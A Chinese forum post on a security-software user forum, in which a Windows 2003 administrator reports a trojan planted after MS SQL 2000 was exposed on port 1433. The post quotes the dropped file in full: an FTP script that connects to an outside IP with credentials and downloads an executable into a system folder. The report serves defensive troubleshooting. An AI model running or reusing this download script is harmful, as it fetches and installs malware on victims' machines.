hncsl2009
新手上路
积分 24
发帖 24
注册 2010-6-15
|
#1 微点对1433端口的防御,阻挡失败
系统环境: win2003
防火墙: 微点主动防御
现象:
一旦启动ms sql2000,采用默认端口1433,运行几分钟,微点就提示有木马侵入(这点很棒的),但是不能阻止原生的木马。检查系统,发现在C:\Documents and Settings目录,被恶意的植入了一个文件onfcctv1.dat,打开后期内容为:
open 115.47.41.113
12345
12345
get cctv1.exe C:\DOCUME~1\oncctv1.exe
bye
手动关闭数据库后,手动删除这些木马程序,系统基本恢复正常(未经深度检测)。
微点为什么不能阻止恶意植入文件呢?
|
※ ※ ※ 本文纯属【hncsl2009】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|